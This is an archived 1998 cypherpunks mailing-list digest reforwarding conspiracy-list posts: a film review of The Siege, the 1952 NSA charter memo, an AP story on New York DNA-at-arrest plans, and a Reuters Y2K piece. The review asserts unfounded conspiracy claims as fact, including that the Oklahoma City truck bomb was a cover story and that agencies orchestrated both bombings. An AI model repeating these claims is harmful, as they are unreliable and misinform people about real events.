Subject: [CTRL] The Siege: PsyOps Movie Prepares U.S. for Martial Law
Message-ID: <199812180318.TAA03827@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: RoadsEnd@AOL.COM
Subject: [CTRL] The Siege: PsyOps Movie Prepares U.S. for Martial Law
Date: Sun, 13 Dec 1998 13:06:29 EST
To: CTRL@LISTSERV.AOL.COM

 -Caveat Lector-

from:
http://www.zolatimes.com/V2.42/pageone.html
<A HREF="http://www.zolatimes.com/V2.42/pageone.html">Laissez Faire City Times
- Volume 2 Issue 42</A>
The Laissez Faire City Times
December 14, 1998 - Volume 2, Issue 42
Editor & Chief: Emile Zola
-----
The Siege: PsyOps Movie Prepares U.S. for Martial Law

by Uri Dowbenko


The Siege is a slick commercial for the American Police State.

Starting with actual newsclips intermixed with movie footage, a radical
fundamentalist Muslim cleric is taken hostage. President Clinton -- out
of context -- says "I am outraged by it," a speech he made after the
Oklahoma City Bombing. Then he says, "Those who did it must not be
allowed to go unpunished." That was the stump speech for his so-called
Anti-Terrorism Bill, which didn't have a chance of passing before the
Bombing. The mix of "real" newsclips intercut with movie footage -- a
muezzin's calls to prayer and subsequent scenes of slaughter in the
desert -- makes an unsubtle direct correlation between Muslims and
terrorism.

Cut to Manhattan. FBI man Anthony Hubbard (Denzel Washington) has to
deal with a hostage crisis and a bus bomb which turns out to be a ruse.
His partner is Lebanese, an Arab-American named Frank Haddad (Tony
Shalhoub) who is gung-ho and acts as a translator -- until they grab his
kid and put him in the New York Concentration Camp. Understandably that
sours him on the FBI.

Soon enough there's interagency rivalry with CIA woman Elise Kraft
(Annette Bening). She tells the FBI man that "we're on the same team,"
but they both know it's a lie. He tells her "CIA has no charter to
operate domestically." Yuck yuck -- as if that ever kept the CIA from
engaging in criminal activities on US soil.

The subtext of the movie, grounded in real-life history, is that CIA
financed and trained indigenous "rebel" movements around the world, then
unceremoniously betrayed them when US policy changed. The betrayed CIA
"terrorists" then typically returned to US soil becoming pawns in
elaborate spy agency games, which most recently resulted in the New York
World Trade Center Bombing and the Oklahoma City Bombing.

Later, in a flash of realization about her own culpability, the CIA
woman says to Samir (Sami Bouajila), one of the suspected "terrorists":
"Don't tell me we financed your operation?" He smiles disbelievingly at
her naivete.

Disinformation rules in The Siege. Here are the most obvious propaganda
factoids.

1. Demonizing the Militia. Continuing the mainstream-media propaganda,
Denzel Washington asks his fellow feds in the FBI office, "You think
it's militia?" "Not their style," they answer, as if most militas were
capable of "terrorism" without the active participation by undercover
CIA, FBI, or BATF agent provocateurs.

2. Demonizing the Internet. "Everybody on the Internet knows
explosives," says Washington, spreading the lie about how the Internet
is a tool of subversion and therefore must be controlled. Department of
Justice has lobbied long and hard for anti-internet, anti-cryptography
legislation.

3. Demonizing Cash. "Where does a guy like you come up with ten thousand
dollars?" the FBI man berates the Arab suspect, implying that cash
anywhere is immediately suspect. According to US State Propaganda, only
"terrorists" or "money launderers" use cash. This reinforces the
suspicion in moviegoers' minds that only "criminals" would have any
concerns about privacy.

General Devereaux (Bruce Willis) takes over when a state of emergency
and martial law is declared in Manhattan. There's a couple of throwaway
lines -- complete with requisite handwringing -- about Posse Comitatus
-- the law which mandates that US troops can not be used against US
citizens -- and how President Lincoln suspended habeus corpus, an
unchallenged precedent for martial law.

Willis says "We can't go in until the president invokes the War Powers
Act."

Does that mean the country is still operating under war and emergency
powers? Dr. Eugene Schroeder's controversial book Constitution: Fact or
Fiction (Buffalo Creek Press, PO BOx 2424, Cleburne, Texas 76033)
explains this provocative thesis. He says that the reason why the US has
gone downhill, becoming in essence an unconstitutional dictatorship, is
because "since March 9, 1933, the United States has been in a state of
declared National Emergency," according to Senate Report 93-549.

The Siege is really a turf war -- not between gangs -- but between Feds.
It's FBI vs. CIA vs. National Security Council vs. America. The civil
rights context -- Is martial law justified? Under what circumstances? --
is merely window dressing for the real question -- How will the Feds
split up the country?

The movie shows that escalating acts of "terrorism" in America are
eerily similar to the Reichstag Fire in pre-WWII Germany, a rationale
for a totalitarian-state power grab. In America, it would simply be the
pretext for dispensing with that pesky US Constitution altogether.

Willis finally says, "I am declaring a state of martial law." US
soldiers invade Brooklyn. Lines of camo-clad grunts march across the
Brooklyn Bridge, while Humvees patrol Wall Street. After capturing an
Arab suspect, Willis says, "The time has come for one man to suffer to
save hundreds." That's his rationale for torture.

The FBI man says, "Bend the law. Shred the Constitution. If we torture
him, everything we fought for is over," implying speciously that the
"terrorists" will win. As if... as if New York Police brutality has
never been committed. As if CIA atrocities were never done. As if FBI
criminal behavior was never covered up.

Reinforcing the bogus cover story of a "truck bomb" blowing up the
Oklahoma City Federal Building, there's -- you guessed it -- a truck
bomb in The Siege which destroys One Federal Plaza in New York.

David Hoffman's indispensable book The Oklahoma City Bombing and the
Politics of Terror (Feral House, 2532 Lincoln Blvd., Suite 359, Venice,
CA 90291, 800-788-6246; $18.95) demolishes this fraudulent theory and
dissects the elements of another US Government covert ops gone bad.

In his ground-breaking 509-page book, Hoffman describes the the stewpot
of CIA, FBI, BATF, Neo-Nazi, Arab, Israeli, and German intelligence
operatives, as well as the US Government's ludicrous "Single Bomb
Theory." Like Arlen Spector's infamous "Single Bullet Theory" about the
bullet which made a U-Turn inside President Kennedy's body, this
"fertilizer bomb theory" is just as dopey. Fertilizer - - as in BS -- is
the theory's primary ingredient.

Director Ed Zwick specializes in making Establishment-propaganda movies.
Glory was about African-Americans brainwashed to fight the Civil War.
Courage Under Fire was about all kinds of Americans brainwashed to fight
in the Gulf War. Denzel Washington's a veteran; he's been in both
movies.

In The Siege, Zwick cranks up the xenophobia. Despite its pretensions as
a politically-correct parable for "tolerance," The Siege demonizes both
Arabs and Muslims. Zwick and film producer Lynda Obst have made a movie
which is state-of- the-art PsyOps for the masses. Psychological
Operations (PsyOps) is a military term for non-lethal warfare. It's just
masquerading as "entertainment."

-30-


from The Laissez Faire City Times, Vol. 2, No. 42, Dec. 14, 1998
-----
The Laissez Faire City Times is a private newspaper. Although it is
published by a corporation domiciled within the sovereign domain of
Laissez Faire City, it is not an "official organ" of the city or its
founding trust. Just as the New York Times is unaffiliated with the city
of New York, the City Times is only one of what may be several news
publications located in, or domiciled at, Laissez Faire City proper. For
information about LFC, please contact CityClerk@LFCity.com.

------------------------------------------------------------------------
Published by
Laissez Faire City Netcasting Group, Inc.
Copyright 1998 - Trademark Registered with LFC Public Registrar
All Rights Reserved
-----
Aloha, He'Ping,
Om, Shalom, Salaam.
Em Hotep, Peace Be,
Omnia Bona Bonis,
All My Relations.
Adieu, Adios, Aloha.
Amen.
Roads End
Kris

DECLARATION & DISCLAIMER
==========
CTRL is a discussion and informational exchange list. Proselyzting propagandic
screeds are not allowed. Substance-not soapboxing!  These are sordid matters
and 'conspiracy theory', with its many half-truths, misdirections and outright
frauds is used politically  by different groups with major and minor effects
spread throughout the spectrum of time and thought. That being said, CTRL
gives no endorsement to the validity of posts, and always suggests to readers;
be wary of what you read. CTRL gives no credeence to Holocaust denial and
nazi's need not apply.

Let us please be civil and as always, Caveat Lector.

========================================================================
To subscribe to Conspiracy Theory Research List[CTRL] send email:
SUBSCRIBE CTRL [to:] LISTSERV@LISTSERV.AOL.COM

To UNsubscribe to Conspiracy Theory Research List[CTRL] send email:
SIGNOFF CTRL [to:] LISTSERV@LISTSERV.AOL.COM

Om




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 18 Dec 1998 12:42:41 +0800
To: cypherpunks@cyberpass.net
Subject: [CTRL] NSA Charter from Wiretap
Message-ID: <199812180318.TAA03838@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "Shane A. Saylor, Eccentric Bard" <shane@CAIS.COM>
Subject: [CTRL] NSA Charter from Wiretap
Date: Tue, 15 Dec 1998 21:41:47 -0500
To: CTRL@LISTSERV.AOL.COM

 -Caveat Lector-

From: telecom@eecs.nwu.edu (TELECOM Moderator)
Newsgroups: comp.dcom.telecom
Subject: FOIA Jewel: Original Charter of the National Security Agency
Message-ID: <3748@accuvax.nwu.edu>
Date: 11 Feb 90 18:15:00 GMT
Organization: TELECOM Digest
Lines: 322
X-Telecom-Digest: Special Edition: Birth of NSA


{{ This is a special edition of TELECOM Digest sent to the mailing  }}
{{ list this date. Although not strictly telecom-related, I thought }}
{{ Usenet comp.dcom.telecom readers would enjoy seeing it.   PT     }}


TELECOM Digest     Sun, 11 Feb 90 11:35:18 CST    Special: Birth of NSA

Today's Topics:                             Moderator: Patrick Townson

    FOIA Jewel: Original Charter of the National Security Agency
----------------------------------------------------------------------

Date: Sun, 11 Feb 90 00:03 EST
From: CJS@cwru.bitnet
Subject: FOIA Jewel: Original Charter of the National Security Agency


    At  12:01 ON the  morning of November 4,  1952, a new federal
agency was born.  Unlike other such bureaucratic births, however,
this one arrived in silence.   No news coverage, no congressional
debate, no press announcement,  not even the whisper of  a rumor.
Nor could any  mention of  the new organization  be found in  the
Government Organization  Manual of  the Federal  Register or  the
Congressional Record.   Equally invisible  were the new  agency's
director, its numerous buildings, and its ten thousand employees.

    Eleven days earlier,  on October 24, President Harry S Truman
scratched  his   signature  on   the  bottom   of  a   seven-page
presidential memorandum addressed  to secretary of State  Dean G.
Acheson  and Secretary of  Defense Robert A.  Lovett.  Classified
top  secret  and  stamped  with  a  code  word  that  was  itself
classified, the  order directed the establishment of an agency to
be  known as  the National  Security Agency.    It was  the birth
certificate  for  America's  newest and  most  secret  agency, so
secret in  fact that only  a handful  in the government  would be
permitted to know of its existence.

    -James Bamford, The Puzzle Palace (1982) at 15.

*****************************************************************

                                        A 20707 5/4/54/OSO
                                        NSA TS CONTL. NO 73-00405
                                        COPY: D321

                                        Oct 24 1952

MEMORANDUM FOR:     The Secretary of State
                    The Secretary of Defense

SUBJECT:  Communications Intelligence Activities

    The  communications intelligence  (COMINT) activities  of the
United States are  a national  responsibility.  They  must be  so
organized and managed as to exploit  to the maximum the available
resources in all  participating departments  and agencies and  to
satisfy  the legitimate  intelligence  requirements  of all  such
departments and agencies.

    I  therefore designate  the Secretaries of  State and Defense
as  a Special  Committee  of the  National  Security Council  for
COMINT,  which  Committee  shall,  with  the  assistance  of  the
Director of  Central Intelligence,  establish policies  governing
COMINT  activities. and keep me advised  of such policies through
the Executive Secretary of the National Security Council.

    I  further designate  the Department of  Defense as executive
agent  of   the  Government,   for  the   production  of   COMINT
information.

    I  direct  this  Special  Committee  to  prepare   and  issue
directives which shall include the provisions set forth below and
such other provisions  as the Special Committee  may determine to
be necessary.

    1.    A   directive  to   the  United   States  Communication
Intelligence  Board  (USCIB).  This  directive will  replace the
National Security Council Intelligence Directive No. 9, and shall
prescribe   USCIB's   new   composition,   responsibilities   and
procedures in the  COMINT fields.   This directive shall  include
the following provisions.

a. USCIB  shall be reconstituted  as a body  acting for
    and  under  the  Special  Committee,  and  shall  operate  in
    accordance with the  provisions of  the new directive.   Only
    those  departments  or  agencies  represented  in  USCIB  are
    authorized to engage in COMINT activities.

b.  The  Board  shall  be  composed  of  the  following
    members:
     (1) The  Director  of  Central Intelligence,  who shall be
         the Chairman of the Board.
     (2) A representative of the Secretary of State.
     (3) A representative of the Secretary of Defense
     (4) A representative of the Director of the Federal
         Bureau of Investigation.
     (5) The Director of the National Security Agency.
     (6) A representative of the Department of the Army.
     (7) A representative of the Department of the Navy.
     (8) A representative of the Department of the Air Force.
     (9) A representative of the Central Intelligence Agency.

c. The Board shall have a  staff headed by an executive
    secretary who  shall be  appointed by the  Chairman with  the
    approval of the majority of the Board.

d. It shall be the duty of the Board to advise and make
    recommendations to the  Secretary of  Defense, in  accordance
    with  the  following procedure,  with respect  to  any matter
    relating  to communications  intelligence which  falls within
    the jurisdiction of the Director of the NSA.
     (1) The Board shall reach its decision by majority
     vote.  Each  member of  the Board shall  have one  vote
     except the  representatives of  the Secretary  of State
     and of the  Central Intelligence Agency who  shall each
     have two votes.  The  Director of Central Intelligence,
     as Chairman, will have no vote.  In the event  that the
     Board  votes  and reaches  a  decision,  any dissenting
     member  of  the  Board may  appeal  from  such decision
     within 7 days of  the Special Committee.  In  the event
     that the Board votes but fails to reach a decision, any
     member of the  Board may  appeal within 7  days to  the
     Special  Committee.    In   either  event  the  Special
     Committee   shall   review    the   matter,   and   its
     determination thereon shall  be final.  Appeals  by the
     Director  of NSA  and/or  the  representatives  of  the
     Military  Departments  shall  only  be  filed with  the
     approval of the Secretary of Defense.
     (2) If any matter is voted on by the Board but -
      (a)  no decision  is reached  and any  member
      files an appeal;
      (b)  a  decision  is  reached  in  which  the
      representative  of the  Secretary of  Defense does
      not concur and files an appeal;
     no action  shall be taken  with respect to  the subject
     matter until the  appeal is decided, provided  that, if
     the Secretary of Defense determines, after consultation
     with the Secretary  of State,  that the subject  matter
     presents a problem of an  emergency nature and requires
     immediate action,  his decision  shall govern,  pending
     the  result  of  the  appeal.   In  such  an  emergency
     situation  the  appeal  may be  taken  directly  to the
     President.
     (3)  Recommendations  of  the  Board  adopted   in
     accordance  with  the  foregoing  procedures  shall  be
     binding on the Secretary of Defense.   Except on matter
     which have been voted on by  the Board, the Director of
     NSA shall discharge  his responsibilities in accordance
     with his own  judgment, subject to the direction of the
     Secretary of Defense.
     (4) The Director  of NSA  shall make such  reports
     and furnish  such information from time to  time to the
     Board,  either orally  or in  writing, as the  Board my
     request, and shall bring to  the attention of the Board
     either in such reports or  otherwise any major policies
     or programs in advance of their adoption by him.
e. It  shall  also be  the duty  of  the Board  as to
    matters not falling within the jurisdiction of NSA;
    (1) To coordinate the  communications intelligence
    activities   among   all   departments   and   agencies
    authorized by the President to participate therein;
    (2) To initiate, to formulate policies concerning,
    and  subject  to  the  provision of  NSCID  No.  5,  to
    supervise all arrangements with  foreign governments in
    the field of communications intelligence; and
    (3)   to   consider   and   make   recommendations
    concerning   policies   relating    to   communications
    intelligence of common interest  to the departments and
    agencies, including security  standards and  practices,
    and, for  this purpose,  to investigate  and study  the
    standards  and   practices  of  such   departments  and
    agencies   in   utilizing    and   protecting    COMINT
    information.
f. Any recommendation of the Board with respect  to the
    matters  described in paragraph e above shall  be binding on
    all  departments  or  agencies of  the  Government  if  it is
    adopted  by the  unanimous vote of the  members of the Board.
    Recommendations  approved by  the majority,  but not  all, of
    the  members of the Board  shall be transmitted by  it to the
    Special  Committee for  such action as  the Special Committee
    may see fit to take.
g. The Board will meet monthly,  or oftener at the call
    of  the Chairman  or any member, and  shall determine its own
    procedures.

    2. A directive to  the Secretary of Defense.   This
    directive shall include the following provisions:

a. Subject   to  the  specific   provisions  of   this
    directive, the Secretary of  Defense may delegate in whole of
    in  part  authority  over the  Director  of  NSA  within  his
    department as he sees fit.

b. The COMINT  mission of the National  Security Agency
    (NSA) shall be to provide an effective,  unified organization
    and control of the communications  intelligence activities of
    the United States  conducted against foreign  governments, to
    provide for  integrated operational  policies and  procedures
    pertaining thereto.   As  used in  this directive,  the terms
    "communications intelligence"  or "COMINT" shall be construed
    to mean all  procedures and methods used in  the interception
    of communications  other  than foreign  press and  propaganda
    broadcasts  and  the  obtaining  of   information  from  such
    communications by other  than intended recipients,  but shall
    exclude censorship  and the  production and dissemination  of
    finished intelligence.

c. NSA shall be administered  by a Director, designated
    by  the  Secretary of  Defense  after  consultation with  the
    Joint Chiefs of Staff, who shall serve for a  minimum term of
    4  years and  who shall be  eligible for  reappointment.  The
    Director shall be a career commissioned officer of  the armed
    services  on active or reactivated status, and shall enjoy at
    least 3-star rank during the period of his incumbency.

d. Under the  Secretary of  Defense, and in  accordance
    with approved  policies of USCIB,  the Director of NSA  shall
    be responsible  for accomplishing  the mission  of NSA.   For
    this purpose all  COMINT collection and production  resources
    of  the United States  are placed  under his  operational and
    technical  control.    When  action  by  the  Chiefs  of  the
    operating  agencies of the  Services or  civilian departments
    or  agencies is  required, the Director  shall normally issue
    instruction  pertaining to  COMINT operations  through  them.
    However,  due  to the  unique technical  character  of COMINT
    operations,  the Director  is authorized  to issue  direct to
    any  operating elements  under  his operational  control task
    assignments and pertinent  instructions which are within  the
    capacity of such elements to accomplish.  He  shall also have
    direct   access  to,  and   direct  communication  with,  any
    elements  of the  Service or civilian  COMINT agencies on any
    other  matters of operational and technical control as may be
    necessary,  and he  is authorized to  obtain such information
    and intelligence material from  them as he may require.   All
    instruction  issued  by  the  Director  under  the  authority
    provided in this paragraph  shall be mandatory, subject  only
    to  appeal  to  the Secretary  of  Defense  by the  Chief  of
    Service or head of civilian department of agency concerned.
e. Specific  responsibilities  of the  Director of  NSA
    include the following:
     (1)  Formulating  necessary operational  plans and
     policies for the conduct of the U.S. COMINT activities.
     (2)   Conducting   COMINT   activities,  including
     research and development, as required to meet the needs
     of the  departments and agencies  which  are authorized
     to receive the products of COMINT.
     (3)  Determining,  and  submitting to  appropriate
     authorities, requirements for  logistic support for the
     conduct of  COMINT activities,  together with  specific
     recommendations  as  to  what each  of  the responsible
     departments  and  agencies  of  the  Government  should
     supply.
     (4) Within  NSA's field  of authorized  operations
     prescribing  requisite  security  regulations  covering
     operating   practices,   including   the  transmission,
     handling and distribution of COMINT material within and
     among  the COMINT  elements  under  his  operations  or
     technical   control;   and  exercising   the  necessary
     monitoring   and    supervisory   control,    including
     inspections if necessary, to ensure compliance with the
     regulations.
     (5)  Subject   to  the  authorities   granted  the
     Director  Central  Intelligence   under  NSCID  No.  5,
     conducting all liaison on  COMINT matters with  foreign
     governmental communications intelligence agencies.
f. To  the extent he  deems feasible and  in consonance
    with  the aims  of maximum over-all  efficiency, economy, and
    effectiveness, the Director  shall centralize  or consolidate
    the  performance  of  COMINT   functions  for  which  he   is
    responsible.  It is recognized that in  certain circumstances
    elements of the Armed Forces and other  agencies being served
    will require close COMINT support.  Where necessary for  this
    close  support,  direct  operational  control  of   specified
    COMINT  facilities  and resources  will be  delegated  by the
    Director,  during such  periods  and for  such tasks  as  are
    determined  by him,  to military commanders  or to the Chiefs
    of other agencies supported.
g. The  Director  shall exercise  such  administrative
    control  over COMINT activities as he  deems necessary to the
    effective   performance   of   his   mission.      Otherwise,
    administrative  control  of  personnel  and  facilities  will
    remain with the departments and agencies providing them.
h. The Director shall make provision for participation
    by  representatives of  each of the  departments and agencies
    eligible to receive COMINT  products in those offices of  NSA
    where  priorities  of  intercept and  processing  are finally
    planned.
i. The  Director shall  have  a civilian  deputy whose
    primary responsibility  shall be  to ensure the  mobilization
    and  effective  employment of  the best  available  human and
    scientific  resources in the  field of cryptographic research
    and development.
j. Nothing  in  this  directive  shall contravene  the
    responsibilities  of the  individual departments and agencies
    for  the  final   evaluation  of   COMINT  information,   its
    synthesis  with  information  from  other  sources,  and  the
    dissemination of finished intelligence to users.

    3. The  special nature of  COMINT actives requires that  they
    be treated  in all  respects as  being outside  the framework  of
    other  or general  intelligence  activities.   Order, directives,
    policies, or recommendations  of any  authority of the  Executive
    Branch   relating  to   the  collection,   production,  security,
    handling, dissemination, or  utilization of intelligence,  and/or
    classified material, shall  not be applicable to  COMINT actives,
    unless  specifically   so   stated  and   issued   by   competent
    departmental of agency authority represented on the Board.  Other
    National Security Council Intelligence Directive to the  Director
    of  Central  Intelligence  and  related  implementing  directives
    issued by the Director of Central Intelligence shall be construed
    as  non-applicable  to  COMINT  activities, unless  the  National
    Security Council has made  its directive specifically  applicable
    to COMINT.

     /s/ HARRY S TRUMAN


------------------------------

End of TELECOM Digest Special: Birth of NSA
*****************************





--
A person is like a religion; one face, many aspects
      --Shane A. Saylor, Eccentric Bard ICQ: 9815080
 Operator Taliesin_2 of #SacredNemeton on IRC DALnet

DECLARATION & DISCLAIMER
==========
CTRL is a discussion and informational exchange list. Proselyzting propagandic
screeds are not allowed. Substance-not soapboxing!  These are sordid matters
and 'conspiracy theory', with its many half-truths, misdirections and outright
frauds is used politically  by different groups with major and minor effects
spread throughout the spectrum of time and thought. That being said, CTRL
gives no endorsement to the validity of posts, and always suggests to readers;
be wary of what you read. CTRL gives no credeence to Holocaust denial and
nazi's need not apply.

Let us please be civil and as always, Caveat Lector.

========================================================================
To subscribe to Conspiracy Theory Research List[CTRL] send email:
SUBSCRIBE CTRL [to:] LISTSERV@LISTSERV.AOL.COM

To UNsubscribe to Conspiracy Theory Research List[CTRL] send email:
SIGNOFF CTRL [to:] LISTSERV@LISTSERV.AOL.COM

Om




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 18 Dec 1998 12:39:51 +0800
To: cypherpunks@cyberpass.net
Subject: [CTRL] Fwd: DNA Sample with Every Arrest
Message-ID: <199812180318.TAA03849@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: RoadsEnd@AOL.COM
Subject: [CTRL] Fwd: DNA Sample with Every Arrest
Date: Tue, 15 Dec 1998 23:51:31 EST
To: CTRL@LISTSERV.AOL.COM

 -Caveat Lector-

This is a multi-part message in MIME format.

--part0_913783891_boundary
Content-ID: <0_913783891@inet_out.mail.aol.com.1>
Content-type: text/plain; charset=US-ASCII



--part0_913783891_boundary
Content-ID: <0_913783891@inet_out.mail.aol.com.2>
Content-type: message/rfc822
Content-transfer-encoding: 7bit
Content-disposition: inline

From: DasGOAT@aol.com
Return-path: <DasGOAT@aol.com>
To: RoadsEnd@aol.com
Cc: Robalini@aol.com, nessie@sfbg.com
Subject: DNA Sample with Every Arrest
Date: Tue, 15 Dec 1998 15:57:15 EST
Mime-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7bit

     "Michael Meyers of the New York Civil Rights Coalition said citizens
nationwide are experiencing a crackdown on civil rights.
     ``I think this is the official ushering in of a George Orwellian society.
We will all be suspects in a matter of years.'' .


NYC Wants DNA in All Arrests

NEW YORK (AP) -- Angering civil libertarians who fear ``1984''-style tactics,
Police Commissioner Howard Safir is suggesting that police take a DNA sample
along with the fingerprints of everyone arrested.

``The innocent have nothing to fear,'' Safir said Monday. ``Only if you are
guilty should you worry about DNA testing.''

But civil rights leaders said even the innocent should worry about the plan,
which some contend amounts to an unreasonable search and seizure in violation
of the Fourth Amendment. The proposal would need approval from the state
Legislature to become reality.

``I think this is the official ushering in of a George Orwellian society in
New York City,'' said Michael Meyers, executive director of the New York Civil
Rights Coalition.

Mayor Rudolph Giuliani's administration has come under fire recently for
cutting City Hall off from virtually all public access and for installing more
security cameras to monitor streets.

Norman Siegel, executive director of the New York Civil Liberties Union, said
the DNA proposal is the latest effort by the Giuliani administration to erode
civil rights.

``If someone wants to march and doesn't have a permit, or if someone goes to
the steps of City Hall to read a proclamation, he or she will get arrested,''
Siegel said. ``Under Safir's DNA proposal, the government will obtain their
DNA, and that's a frightening prospect. Why should the government have that
information on that individual?''

Giuliani called opponents of the plan captives of ``old left-wing thinking.''

``The taking of DNA evidence -- from the point of view of anyone but the most
excessive knee-jerk ideologues -- is a very, very helpful thing, it's a good
thing,'' he said. ``DNA can help prove who actually committed violent crime;
it can help prove paternity.''

Under Safir's plan, which he described Monday to students at the Bronx High
School of Science, police would take a swabbing from inside a suspect's cheek
-- a standard method of collecting DNA -- and put test results into a database
for future reference against repeat offenders.

DNA, the unique genetic blueprint of each person, is considered by legal and
forensics experts to be as reliable as fingerprints and far more useful in
identifying culprits of certain crimes.

Safir said a suspect's DNA sample would be destroyed if he were acquitted or
cleared.

Many states allow DNA testing of certain convicts, New York among them. Only
in Louisiana does the testing apply to people under arrest.

Meyers said citizens nationwide are experiencing a crackdown on civil rights.
``We will all be suspects in a matter of years,'' he said.


--part0_913783891_boundary--

DECLARATION & DISCLAIMER
==========
CTRL is a discussion and informational exchange list. Proselyzting propagandic
screeds are not allowed. Substance-not soapboxing!  These are sordid matters
and 'conspiracy theory', with its many half-truths, misdirections and outright
frauds is used politically  by different groups with major and minor effects
spread throughout the spectrum of time and thought. That being said, CTRL
gives no endorsement to the validity of posts, and always suggests to readers;
be wary of what you read. CTRL gives no credeence to Holocaust denial and
nazi's need not apply.

Let us please be civil and as always, Caveat Lector.

========================================================================
To subscribe to Conspiracy Theory Research List[CTRL] send email:
SUBSCRIBE CTRL [to:] LISTSERV@LISTSERV.AOL.COM

To UNsubscribe to Conspiracy Theory Research List[CTRL] send email:
SIGNOFF CTRL [to:] LISTSERV@LISTSERV.AOL.COM

Om




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 18 Dec 1998 12:39:06 +0800
To: cypherpunks@cyberpass.net
Subject: [CTRL] Y2K Fear May Trigger Early Panic
Message-ID: <199812180318.TAA03860@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Lyn McCloskey <MCCLOSL@TOWERS.COM>
Subject: [CTRL] Y2K Fear May Trigger Early Panic
Date: Wed, 16 Dec 1998 17:50:58 -0500
To: CTRL@LISTSERV.AOL.COM

 -Caveat Lector-

Technology Headlines Monday December 14 10:18 AM ET

Fear Of Year 2000 Computer Bug May Trigger Early Panic

By Neil Winton, Science and Technology Correspondent

LONDON (Reuters) - Even if the ``millennium bomb'' does not explode in the
world's computers just over a year from now, 1999 is likely to see rising
panic as people take precautions against computer failure triggered by the
year 2000.

Experts say the most vulnerable countries include Japan, France, Russia and
Brazil and the most vulnerable sectors are utilities, especially power
generation.

``Next year we will see periods of calm broken by occasional news stories
predicting computer systems failures,'' said Ross Anderson of Cambridge
University's Computer Security Research Center. ``My own feeling is that
around August or September panic will start, with hoarding of food and bank
notes. Then the whole thing becomes a self-fulfilling prophecy.''

The time bomb has trivial origins. In the early days of computing, programs
saved what was then precious space by abbreviating years to the last two
digits.

They knew this could cause problems at the turn of the century because
computers would read ``00'' as ``1900'' rather than ``2000'' and crash or
spew out flawed data. But they thought these programs would be history by
then as technology raced ahead.

They were wrong. Now the fear is that old data systems carrying the
millennium bomb or bug could trigger disasters around the world in
everything from defense, transport and telecommunications to energy and
financial services.

As 1999 progresses, early trigger dates are likely to provide sneak
previews of the chaos that may hit as clocks strike midnight on Dec. 31.
The first is Jan. 1, 1999. Programs used in some accounting systems operate
a rolling year ahead as they set renewal dates for insurance premiums or
bank loans and may crash when they reach out beyond Jan. 1, 2000.

Margaret Joachim, Year 2000 coordinator at data processing services company
Electronic Data Systems Corp. (NYSE:EDS - news), says there are other dates
next year that might trigger computer failure.

``April 9, 1999, the 99th day of the year, and Sept. 9, 1999, which might
be recorded as 9-9-99. This is because programmers often used nines as a
cutoff for a program. A row of nines meant 'don't do this anymore,'''
Joachim said.

The world is in differing states of readiness. Information technology
consultancy Gartner Group says the United States is best prepared, followed
by Canada, Australia, South Africa, Israel and Britain. At the bottom of
the list is Brazil, the world's eighth largest economy and a big producer
of industrial components, commodities and grains.

Brazil is unlikely to be able to confine problems within its borders,
according to a recent report by Edward Yardeni, chief economist for
Deutsche Morgan Grenfell in New York.

Japan's lack of action is also causing concern. The Japanese government
said last month that important industries like finance, transport, energy,
telecommunications and medicine were lagging in year 2000 preparation.

Hong Kong's government has said 80 percent of its critical computer systems
were ready for 2000 as of Sept. 30, 1998, but it is worried about small and
medium-sized businesses.

India does not expect much damage because of its small number of computers
-- only around 2.3 million in a nation of about 950 million. But India's
``brain trust'' of software makers have bagged orders worth $1.5 billion to
fix year 2000 problems around the world, said Dewang Mehta, executive
director of the National Association of Software and Service Companies.

In China, authorities have decreed that all government computer systems
must be fixed by March and tests completed by September 1999.

Cambridge University's Anderson said France was most at risk in Western
Europe, with computer failures most likely in the public sector and
especially public utilities. Any problems could quickly become a problem
for neighbors such as Britain, which receives electric power from France.

``There is still quite a question mark over whether France sees the scale
of the problem,'' said Chris Webster, head of year 2000 services at Cap
Gemini.

``There's a real chance that there may be some loss of service from
utilities. Who, when, where or why? Impossible to say. Will it be a
complete loss of power, voltage fluctuations? And there is a remarkable
lack of information from utilities as to what they are expecting to
happen.''

JP Morgan's Year 2000 expert Patrick Ward says Eastern Europe's and
Russia's utilities are a big concern, not least because Russia provides 40
percent of Germany's power.

If some systems crashes are triggered early by the arrival of Jan. 1, 1999,
it might be a blessing in disguise.

``This will involve accounting, planning and budgeting systems rather than
operational executing systems, which carry out day-to-day business. It will
give you some experience in spotting the errors and knowing how to deal
with them,'' Webster said.

But Anderson is taking no chances: ``Personally, I plan to have three
months' food, a working well, three tons of calor (heating) gas and 400
liters of diesel come the dreadful day.''

DECLARATION & DISCLAIMER
==========
CTRL is a discussion and informational exchange list. Proselyzting propagandic
screeds are not allowed. Substance-not soapboxing!  These are sordid matters
and 'conspiracy theory', with its many half-truths, misdirections and outright
frauds is used politically  by different groups with major and minor effects
spread throughout the spectrum of time and thought. That being said, CTRL
gives no endorsement to the validity of posts, and always suggests to readers;
be wary of what you read. CTRL gives no credeence to Holocaust denial and
nazi's need not apply.

Let us please be civil and as always, Caveat Lector.

========================================================================
To subscribe to Conspiracy Theory Research List[CTRL] send email:
SUBSCRIBE CTRL [to:] LISTSERV@LISTSERV.AOL.COM

To UNsubscribe to Conspiracy Theory Research List[CTRL] send email:
SIGNOFF CTRL [to:] LISTSERV@LISTSERV.AOL.COM

Om




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Fri, 18 Dec 1998 10:16:36 +0800
To: "Marcel Popescu" <mdpopescu@geocities.com>
Subject: RE: I must admit. . .
In-Reply-To: <000301be2a14$9e5a8ec0$22fcb3c3@roknet.ro>
Message-ID: <199812180028.TAA009.26@whgiii>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

In <000301be2a14$9e5a8ec0$22fcb3c3@roknet.ro>, on 12/18/98 
   at 01:26 AM, "Marcel Popescu" <mdpopescu@geocities.com> said:

